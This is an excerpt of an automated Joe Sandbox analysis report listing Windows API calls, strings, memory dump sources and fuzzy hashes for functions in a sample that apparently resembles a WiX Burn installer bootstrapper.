                                                                                                                                                              • Instruction ID: fbd8e6d627847ac6c90fbd831883533bce17a2e651df136ea53d807889a63155
                                                                                                                                                              • Opcode Fuzzy Hash: 455539a68f5edb1b971b387a2ea33ca57e938129a620d6de0c293463d161865a
                                                                                                                                                              • Instruction Fuzzy Hash: 7661C67A100515EFCB135F84CE05C55BBB2FF08314715C55AFAA99A632C736E821EF45
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807C74
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807C7F
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807C8A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                              • String ID: `<u$atomutil.cpp
                                                                                                                                                              • API String ID: 2724874077-4051019476
                                                                                                                                                              • Opcode ID: 7275981dccb7dae40f4796a0d7f83cdccebca0dd4b17bd59d868ec1de666eb68
                                                                                                                                                              • Instruction ID: 79510d8c8e83dc8693d5a964c72668137ea544d8efd7a64a9a77f331ed29ac15
                                                                                                                                                              • Opcode Fuzzy Hash: 7275981dccb7dae40f4796a0d7f83cdccebca0dd4b17bd59d868ec1de666eb68
                                                                                                                                                              • Instruction Fuzzy Hash: 76514D71D0522AAFEB61DB64CC44FAEB7B9FF04710F154198E905EB291DB71AE40CBA0
                                                                                                                                                              APIs
                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0080123F
                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,007D70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00801276
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 0080136E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue$lstrlen
                                                                                                                                                              • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                              • API String ID: 3790715954-1648651458
                                                                                                                                                              • Opcode ID: 8ef95f0efc8f3d8459537d57309d1446269868b3656aa9e9abe21e3922f5c73b
                                                                                                                                                              • Instruction ID: 20678b2a8a9222f05cb6dbb80f14aeff09de82ceb0ff2b397478fd7c1c49b72f
                                                                                                                                                              • Opcode Fuzzy Hash: 8ef95f0efc8f3d8459537d57309d1446269868b3656aa9e9abe21e3922f5c73b
                                                                                                                                                              • Instruction Fuzzy Hash: 22419F35A0021AEFDF61DF95CC89ABEB7A9FF44724F164169E901EB780D6349D009BA0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0080490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,007D8770,00000000,00000000,00000000,00000000,00000000), ref: 00804925
                                                                                                                                                                • Part of subcall function 0080490D: GetLastError.KERNEL32(?,?,?,007D8770,00000000,00000000,00000000,00000000,00000000), ref: 0080492F
                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00805C09,?,?,?,?,?,?,?,00010000,?), ref: 008063C0
                                                                                                                                                              • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,00805C09,?,?,?,?), ref: 00806412
                                                                                                                                                              • GetLastError.KERNEL32(?,00805C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 00806458
                                                                                                                                                              • GetLastError.KERNEL32(?,00805C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 0080647E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLast$Write$Pointer
                                                                                                                                                              • String ID: dlutil.cpp
                                                                                                                                                              • API String ID: 133221148-2067379296
                                                                                                                                                              • Opcode ID: 75cefa16d2c39e8d97c7eee5dbedd6dc7f47226675597986f536c6ff26ea70eb
                                                                                                                                                              • Instruction ID: bdb008e0bfedaf848bda3b241840338e94631c47adcd1bfcca2a69ebe4fb65b0
                                                                                                                                                              • Opcode Fuzzy Hash: 75cefa16d2c39e8d97c7eee5dbedd6dc7f47226675597986f536c6ff26ea70eb
                                                                                                                                                              • Instruction Fuzzy Hash: 64419D7290062ABFEB618E94CD85BAA7B68FF04720F154225FD00E61E0E371DD70DBA5
                                                                                                                                                              APIs
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,007FFFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007FFFEF,007E12CF,?,00000000), ref: 007C246E
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007FFFEF,007E12CF,?,00000000,0000FDE9,?,007E12CF), ref: 007C247A
                                                                                                                                                                • Part of subcall function 007C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BDB
                                                                                                                                                                • Part of subcall function 007C3BD3: HeapSize.KERNEL32(00000000,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BE2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
• String ID: strutil.cpp
• API String ID: 3662877508-3612885251
• Opcode ID: 6acd77514f6430682e12380cb6c4e5b2bb8dd1adaa3dbccc6920f676641fef5f
• Instruction ID: cddfeeadd73c923b4679dd5f73e9393be0e7d5ef3ab8b0eeff76aebfc54decff
• Opcode Fuzzy Hash: 6acd77514f6430682e12380cb6c4e5b2bb8dd1adaa3dbccc6920f676641fef5f
• Instruction Fuzzy Hash: 7431E33020065AEFE7149E699CC4F67339DBB44364B20826DFE119B2A2E779CD1297A0
APIs
• CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 007EADB3
Strings
• Failed to extract all payloads from container: %ls, xrefs: 007EADF7
• Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 007EAE4A
• Failed to open container: %ls., xrefs: 007EAD85
• Failed to extract payload: %ls from container: %ls, xrefs: 007EAE3E
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CompareString
• String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
• API String ID: 1825529933-3891707333
• Opcode ID: 514c0e70f63c7e06b0d4180f20c7defada5ba1b456734968d6f0236a96eed12f
• Instruction ID: 83664ecee0bf6caaff5fd324521c07ff03ecfe8fbd00d3cda2ac2cf9c0488585
• Opcode Fuzzy Hash: 514c0e70f63c7e06b0d4180f20c7defada5ba1b456734968d6f0236a96eed12f
• Instruction Fuzzy Hash: 27310232D01159FBCF22EAE5CC46E8E7768EF08720F104215FD20A6191E739AA50DBA2
APIs
  • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
  • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
• SysFreeString.OLEAUT32(00000000), ref: 00807AF4
• SysFreeString.OLEAUT32(?), ref: 00807AFF
• SysFreeString.OLEAUT32(00000000), ref: 00807B0A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: FreeString$Heap$AllocateProcess
• String ID: `<u$atomutil.cpp
• API String ID: 2724874077-4051019476
• Opcode ID: a7bff558b2276771b139f360df18e431ecd7132e285f5f83c47b3c204e007a8a
• Instruction ID: 41ff3eb0c88586118d10c60b9007ec0754d2c91dc4fba928e2ef517e6e285ffd
• Opcode Fuzzy Hash: a7bff558b2276771b139f360df18e431ecd7132e285f5f83c47b3c204e007a8a
• Instruction Fuzzy Hash: 67318432E05539BBCB22AB94CC45F9EBBA9FF00760F154165E901FB191D770AE009BE0
APIs
• CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,007D0654,00000001,00000001,00000001,007D0654,00000000), ref: 007CF07D
• RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,007D0654,00000001,00000001,00000001,007D0654,00000000,00000001,00000000,?,007D0654,00000001), ref: 007CF09A
Strings
• Failed to remove update registration key: %ls, xrefs: 007CF0C7
• PackageVersion, xrefs: 007CF05E
• Failed to format key for update registration., xrefs: 007CF033
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseCompareString
• String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
• API String ID: 446873843-3222553582
• Opcode ID: c30e9404b5b065ae1b1d6842de2a419aaf9e83d5dbbd8df22a1a1a9a74ee1569
• Instruction ID: 0facffffe753f6f91dba018967305ad0cd55d11c6ed5a619cd6cbe28b3940b76
• Opcode Fuzzy Hash: c30e9404b5b065ae1b1d6842de2a419aaf9e83d5dbbd8df22a1a1a9a74ee1569
• Instruction Fuzzy Hash: 9A217A31D01129BADB219B69CC49FAFBFB9EF05720F100179FD14E2191D7359A40DA91
APIs
  • Part of subcall function 00804440: FindFirstFileW.KERNEL32(007E923A,?,00000100,00000000,00000000), ref: 0080447B
  • Part of subcall function 00804440: FindClose.KERNEL32(00000000), ref: 00804487
• RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00804430
  • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
  • Part of subcall function 00801217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0080123F
  • Part of subcall function 00801217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,007D70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00801276
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseFindQueryValue$FileFirstOpen
• String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
• API String ID: 3397690329-3978359083
• Opcode ID: 9aee79378a6ced7ff606d00447e4b51908bea50c6a78ea9d2eb5cf37a8f77200
• Instruction ID: 132201597ac6e24fb3fc30377545df6a785700c7e46540f0aaddfd052f4ffd50
• Opcode Fuzzy Hash: 9aee79378a6ced7ff606d00447e4b51908bea50c6a78ea9d2eb5cf37a8f77200
• Instruction Fuzzy Hash: A631BFB1981619FFDF60AF85CC41AAEB774FF00750F55907AEA05E61A1E3319E80CB64
APIs
• CopyFileW.KERNEL32(00000000,007C4DBC,00000000,?,?,00000000,?,0080412D,00000000,007C4DBC,00000000,00000000,?,007D85EE,?,?), ref: 00804033
• GetLastError.KERNEL32(?,0080412D,00000000,007C4DBC,00000000,00000000,?,007D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00804041
• CopyFileW.KERNEL32(00000000,007C4DBC,00000000,007C4DBC,00000000,?,0080412D,00000000,007C4DBC,00000000,00000000,?,007D85EE,?,?,00000001), ref: 008040AC
• GetLastError.KERNEL32(?,0080412D,00000000,007C4DBC,00000000,00000000,?,007D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008040B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CopyErrorFileLast
• String ID: fileutil.cpp
• API String ID: 374144340-2967768451
• Opcode ID: 02f1821c17ed4ff0167f91dfa0cc083ce840bda615caa7876435efa21c6b5048
• Instruction ID: 8b91c6e871277c0d3d38a94ec3670a9301b65a082205a51e8cc350d3eb8e2395
• Opcode Fuzzy Hash: 02f1821c17ed4ff0167f91dfa0cc083ce840bda615caa7876435efa21c6b5048
• Instruction Fuzzy Hash: 652126F6680B3697EBF00AA64C40B3B6698FF11BA0B14113AFF04FB5D1E7618C4082E0
APIs
• _MREFOpen@16.MSPDB140-MSVCRT ref: 007CEF56
  • Part of subcall function 00804153: SetFileAttributesW.KERNEL32(007E923A,00000080,00000000,007E923A,000000FF,00000000,?,?,007E923A), ref: 00804182
  • Part of subcall function 00804153: GetLastError.KERNEL32(?,?,007E923A), ref: 0080418C
  • Part of subcall function 007C3C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,007CEFA1,00000001,00000000,00000095,00000001,007D0663,00000095,00000000,swidtag,00000001), ref: 007C3C88
Strings
• Failed to allocate regid file path., xrefs: 007CEFB5
• Failed to format tag folder path., xrefs: 007CEFC3
• Failed to allocate regid folder path., xrefs: 007CEFBC
• swidtag, xrefs: 007CEF65
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AttributesDirectoryErrorFileLastOpen@16Remove
• String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
• API String ID: 1428973842-4170906717
• Opcode ID: a8c52198b595c83efa174cb8da7f26f811d19c9e07e3fcadc63562914309e1fe
• Instruction ID: 805b3c950c1016b9a323bef94182a095ec92a8c568cf1ee142c039cff6ca3dd9
• Opcode Fuzzy Hash: a8c52198b595c83efa174cb8da7f26f811d19c9e07e3fcadc63562914309e1fe
• Instruction Fuzzy Hash: F0217A31D00518FBCB65EB99CC46F9DFBB5FF44310F1080ADF524A62A1D7799A81AB90
APIs
  • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
• CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 007E8E3A
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,007CF7E0,00000001,00000100,000001B4,00000000), ref: 007E8E88
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to enumerate uninstall key for related bundles., xrefs: 007E8E99
                                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 007E8DD7
                                                                                                                                                              • Failed to open uninstall registry key., xrefs: 007E8DFD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCompareOpenString
                                                                                                                                                              • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                              • API String ID: 2817536665-2531018330
                                                                                                                                                              • Opcode ID: 4a7b9e6774b8fc81a62b570dedc25489851215607415e9720240055c11068149
                                                                                                                                                              • Instruction ID: a7b7a7857562bd28f295de0883d8dc4e304551196313fafd4cedbc5f211e6a62
                                                                                                                                                              • Opcode Fuzzy Hash: 4a7b9e6774b8fc81a62b570dedc25489851215607415e9720240055c11068149
                                                                                                                                                              • Instruction Fuzzy Hash: 8921C932901268FFDB51AA95CC46FEEBA79FF08720F144264F814B6190DB794E90E691
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007ED2EE
                                                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 007ED31C
                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 007ED325
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                              • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                                                                                                              • API String ID: 944053411-3611226795
                                                                                                                                                              • Opcode ID: 1907f51cb9ea77511aa511b422520ee4f488c9792497ddaa216d711c5f97610c
                                                                                                                                                              • Instruction ID: 8df50ba8611f813bc498b2e35ed0170fcedbe49a93cdd7a57de4a975567eb980
                                                                                                                                                              • Opcode Fuzzy Hash: 1907f51cb9ea77511aa511b422520ee4f488c9792497ddaa216d711c5f97610c
                                                                                                                                                              • Instruction Fuzzy Hash: 4F21A1B4600346FFDB10AF68D845A99BBF5FF48324F108629F964E7352C775AD508B90
                                                                                                                                                              APIs
                                                                                                                                                              • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,007E6B11,00000000,?), ref: 0080591D
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007E6B11,00000000,?,?,?,?,?,?,?,?,?,007E6F28,?,?), ref: 0080592B
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,007E6B11,00000000,?), ref: 00805965
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007E6B11,00000000,?,?,?,?,?,?,?,?,?,007E6F28,?,?), ref: 0080596F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                                                                                                              • String ID: svcutil.cpp
                                                                                                                                                              • API String ID: 355237494-1746323212
                                                                                                                                                              • Opcode ID: ffd5933b2999735809d8cd7c0be99f6a0d526331edb19ae29e47e87fc68809af
                                                                                                                                                              • Instruction ID: 66bc2b111d00ec72e9bbaebcaf2a7fcc2d1d8a1282c6328ccaaf85ed75e1ab74
                                                                                                                                                              • Opcode Fuzzy Hash: ffd5933b2999735809d8cd7c0be99f6a0d526331edb19ae29e47e87fc68809af
                                                                                                                                                              • Instruction Fuzzy Hash: AD21F336941A39F7E7715A95AD08FAFBE6DFF40B70F114015BD05EB280E6258D009AF0
                                                                                                                                                              APIs
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00803258
                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00803264
                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 008032D8
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 008032E3
                                                                                                                                                                • Part of subcall function 00803498: SysAllocString.OLEAUT32(?), ref: 008034AD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$AllocVariant$ClearFreeInit
